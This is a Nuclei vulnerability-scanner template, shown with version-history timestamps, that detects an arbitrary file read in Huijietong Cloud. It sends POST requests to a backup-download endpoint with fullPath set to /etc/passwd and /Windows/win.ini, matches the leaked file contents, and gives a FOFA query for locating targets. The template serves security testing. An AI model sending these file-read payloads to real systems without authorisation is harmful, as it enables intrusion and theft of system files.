nuclei-templates/vulnerabilities/other/huijietong-cloud-fileread.yaml

34 lines
715 B
YAML
Raw Normal View History

2021-07-05 16:29:12 +00:00
id: huijietong-cloud-fileread
2021-07-05 16:29:12 +00:00
info:
name: Huijietong Cloud File Read
2022-05-08 12:41:28 +00:00
author: princechaddha,ritikchaddha
2021-07-05 16:29:12 +00:00
severity: high
2022-05-08 12:41:28 +00:00
metadata:
fofa-query: body="/him/api/rest/v1.0/node/role"
2021-07-05 16:29:12 +00:00
tags: huijietong,lfi
requests:
- method: POST
path:
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
body: 'fullPath=/etc/passwd'
2022-05-08 12:44:47 +00:00
2022-05-08 12:41:28 +00:00
- method: POST
path:
- "{{BaseURL}}/fileDownload?action=downloadBackupFile"
body: 'fullPath=/Windows/win.ini'
2021-07-05 16:29:12 +00:00
matchers-condition: and
matchers:
- type: regex
2022-05-08 12:41:28 +00:00
part: body
2021-07-05 16:29:12 +00:00
regex:
- "root:.*:0:0:"
2022-05-09 08:01:15 +00:00
- "\\[(font|extension|file)s\\]"
2022-05-08 12:41:28 +00:00
condition: or
2021-07-05 16:29:12 +00:00
- type: status
status:
- 200